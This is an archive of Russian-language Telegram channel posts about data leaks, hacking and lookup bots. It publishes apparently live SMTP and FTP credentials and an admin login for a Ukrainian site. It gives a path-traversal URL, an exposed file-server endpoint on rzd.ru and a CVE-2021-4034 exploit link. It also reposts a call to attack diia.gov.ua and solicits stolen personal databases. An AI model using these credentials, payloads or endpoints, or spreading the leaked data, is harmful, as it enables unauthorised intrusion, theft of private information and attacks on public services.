4 004
Subscribers
No data24 hours
-217 days
-4030 days
Posts Archive
4 004
Приветствую, дорогие читатели!
За последнее время, даже с тех пор как я вернулся в это прекрасное место вы могли заметить то, что постов очень мало. Если раньше я понимал свою аудиторию и не было войны, из-за которой в комментариях некоторые индивиды устраивают баталии, то сейчас все иначе.
Взять в пример прошлый пост, после которого в мою сторону полилось огромное количество агрессии от Украинского народа (вплане Русско-Украинских отношений я держу нейтралитет). Раньше бы никто и слова не сказал, увидев подобный развлекательный контент.
Я бы хотел выяснить, что ж вам интересно? У меня несколько вариантов, но я понимаю, что люди тут совершенно разных интересов. Кому-то базы и только базы подавай, кому-то таргеты открытые, а кому-то интересное из КБ.
channel: @hashbin (там же и ссылка на чат)
4 004
Смешнее вы сегодня ничего не увидите...
Украинский сервис nexus.ua в качестве почтового ящика использует заблокированный у них же Yandex.ru, в качестве доказательств выкладываю все данные с их сервера.
Заходите – играйте, на самом сервисе ничего интересного, кроме моего красивого поста нет, да прибудет актив на забытый народом сайт.
SMTP
public $smtpuser = 'nexus.ua.2016@yandex.ru'; public $smtppass = 'aXdWtOhXLb'; public $smtphost = 'smtp.yandex.ru'; public $smtpsecure = 'ssl'; public $smtpport = '465';FTP
public $ftp_host = '185.67.1.56'; public $ftp_port = '21'; public $ftp_user = 'nexus'; public $ftp_pass = 'rM97FaLt';nexus.ua/administrator
admin:hashbin4 004
В DuckDuckGo найдена до сих пор активная LFI
Довольно интересный артефакт, теперь дружно идем тестировать.
Но что-то мне подсказывает ничего особо интересного тут найдено не будет 🌚
https://duckduckgo.com/?kad=../../../../../../../../../../usr/share/doc/openssh-client/faqsource: @anarchy_squad channel: @hashbin
4 004
В продолжение к утечке russkoe-slovo.ru, о которой писал @data1eaks
На одном из форумов, как уже обговаривалось, был выложен фазнутый лог ошибок, содержащий огромное количество пользовательских данных и информации о заказах (на скриншоте пример с поломанной кодировкой, но спокойно можно различить, что имеет адрес, номер, почта, стоимость заказа и так далее)
Пока я в кой то веке решил уведомить компанию о таком разочаровании я наткнулcя еще и на russkoe-slovo.ru/.git/config при поверхностном осмотре. 🤦🏻♂️
Вам не хочет плакать, осознавая то, что информационная безопасность настолько ужасно развита? Это уже далеко не первый сайт, который закрыл .git, но не закрыл каталог, блять...
4 004
Я уже не раз говорил про очень интересного бота – @acunetix_robot, который позволяет сканировать любой сайт на уязвимости.
В боте используется программное обеспечение Acunetix, цена на который варьируются от 4,500$ и до бесконечности, тем временем в @acunetix_robot одно полное сканирование любого сайта обойдется вам всего в 30 рублей.
На выходе, как и полагается, у вас будет красиво оформленный PDF-файл с отчетом. На одном таком сканировании можно найти множество уязвимостей и заработать на программе Bug Bounty. (или продать)
#не_реклама_а_благотворительность ❤️
4 004
Восстановление идёт полным ходом!
Ведь только сегодня я решил взяться за приватный канал и начать его восстановление, но в новом обличии, старый пополняться не будет, а для его участников — скидка.
Одновременно с этим проект вернул то, что было его по праву, это тег — @hashbin, который теперь является переходником для безопасности канала.
Напомню, что потерян он был после блокировки канала 2ого октября (осталось 7000пдп вернуть 🥲).
Большую благодарность в возвращении никнейма заслуживает — @LeakData ❤️
Наш чат — t.me/+Ct71KoMeumY5Yjdi
Администратор — @hexuary
4 004
Первоутечка сервиса мониторинга pro-obmen.ru
На этот раз я действительно давно не радовал вас утечками, нужно возвращать былые времена bin.
Из интересного, несколько логов, данные от базы данных и собственно исходники сайта, которые как не удивительно, на PHP (это наверняка говорит об IQ владельца 🤡)
Утечка произошла благодаря открытому .git/config. Разработчики порой закрывают доступ к .git, но забывают добавить /*.
4 004
А вот и я.. Прилетел с Тайланда обратно в Магадан.
За время, пока меня не было произошло несколько крупных утечек и без меня 🙃 Кто имеет какую нибудь из этих утечек – милости прошу в чат, а я сам вас найду. (Гемотест не интересует)
«2 берега» – 10,4 миллионов строк
«Гемотест» – 30,5 миллионов строк
«Paysystem.tech» – якобы утечка QIWI, хотя сама база наверняка не более, чем просто обогащенная база номеров
«Суши Мастер» – минимум 1,3 миллиона строк
«Ykt.ru» – буквально недавно и тоже на 1,3 миллиона строк
«Fotostrana.ru» – тут только 800 тысяч, но тоже прикольно
«RaidForums» – приношу глубокие соболезнования данному проекту, поглубже, чем бутылка в заднице владельца
Не знаю чем вас порадовать, пишите в комментарии, что вы хотите, а я вам подыщу чего нить :)
4 004
Repost from RW
Объединяемся и тестируем DIIA.GOV.UA
Использовать можно все средства, в том числе фаззеры, сканеры, censys.io, shodan.io и проводить тестирование всех возможных поддоменов.
Полезные результаты присылать в ЛС — @russianwar_group тогда у вас появится возможность вступить в наш приватный чат.
4 004
Обстановка в мире конечно не очень, но Тинькофф..
Еще вчера курс на покупку доллара был равен 84 рублям, пару часов назад он поднялся аж до 99 рублей, а сейчас он и вовсе 154 рубля.
Представьте, покупка доллара — 154р, евро — 165р, а на продажу 83 и 93 рубля соответственно...
Да ладно курсы, у меня все и так в долларах, но конкретно я был удивлен, когда увидел то, что творится с Тиньковом. Нельзя нормально снять наличные, а перевод между валютами в приложении и вовсе заблокирован!
На скриншоте можно наблюдать, что нет курса при конвертации, а второе поле равно нулю, press F владельцам Тинькофф и мне.
Единственная информации о ситуации, которую я нашел. Напоминаю, на Тинькофф не были наложены санкции.
4 004
Новый пробив по авто и как на этом заработать
Команда Глаза Бога разработала нового бота, который позволяет пробивать по номеру автомобиля, а также зарабатывать на этом.
Учитывая аудиторию их проектов, можно предположить, что скоро там можно будет пробить большую часть автомобилей РФ, а далее и других СНГ государств.
Насчет заработка, бот платит по 1 рублю за фотографию, сделанную вами, авто должно полностью помещаться на фото и содержать номер. По словам Евгения Антипова, за 4 часа можно спокойно сделать 1000 фоток (aka 1000 рублей), а самые активные смогли сфотографировать 170.000 машин буквально за месяц.
Бот — @avtogram_bot
Не является рекламой.
4 004
Очередная утечка RZD.RU (РЖД) 🤪
Долгое время проект bin не радовал своих подписчиков первоутечками, пора возвращать былое!
Данные товарищи оставили открытый endpoint для доступа к их файловому серверу, который содержит в основном бесполезные фотки, порой документы, а также порно (скорее всего эта ФС содержит также файлы из личных переписок) 🤦♀️
По нашим данным, сервер содержит более 1.500.000 файлов.
Собственно EndPoint:
https://test-osjd.rzd.ru/api/media/resources/{номер_документа_от_1}4 004
Эксплоит CVE-2021-4034 — github.com/berdav/CVE-2021-4034
Уязвимость заключается в локальном повышение привилегий на машине под управлением Debian и части основанных на ней дистрибутивов. Недочет скрывается в приложении polkit-pkexec, которое является инструментом setuid и позволяет обычным пользователям выполнять команды от имени привилегированных с предопределенными политиками.
Информация об уязвимости появилась вчера (25.01.2022), часть фиксов уже выпущена.
4 004
Напоминаю, что у нашего сообщества есть комфортный чат — t.me/+1MmL6TLTXgE2MGY6
Почему-то именно с поиском чата у людей возникают проблемы 🤦♀️
Также, главный администратор @hexuary клиентов в наш эксклюзивный приватный канал, который в скором времени будет неплохо пополнен.
4 004
Масштабная утечка исходных данных украинского портала «Дия»
Источником утечки является один из пользователей многим известного форума RaidForums.
По словам автора, утечка содержит исходный код государственного сайта. Сам я еще не смотрел, но скоро буду.
4 004
@Social_Engineering — Самый крупный ресурс в Telegram, посвященный Хакингу, OSINT и Cоциальной Инженерии.
4 004
По запросу из штатов, ФСБ все таки определили полный состав знаменитой группировки REvil.
Изъято было множество машин, компьютерной техники и средств в различной валюте.
Спасибо за славное время, REvil!
4 004
@EmailPhoneOSINT_bot стукнуло 4 месяца, мне кажется стоит поддержать данный замечательный проект, хотя бы высокой нагрузкой на бота 🧐
Конечно не все так замечательно, как и хотелось бы. Я знаю, что администратор бота меня сейчас читает и наконец, сделает нормальное определение email / номера регуляркой сразу по всем форматам, а не кнопками.
Не помешало бы убрать снижение количества запросов за ложные срабатывания (неправильный формат или вовсе другой текст).
Не стоит забывать и про @iptools_robot!
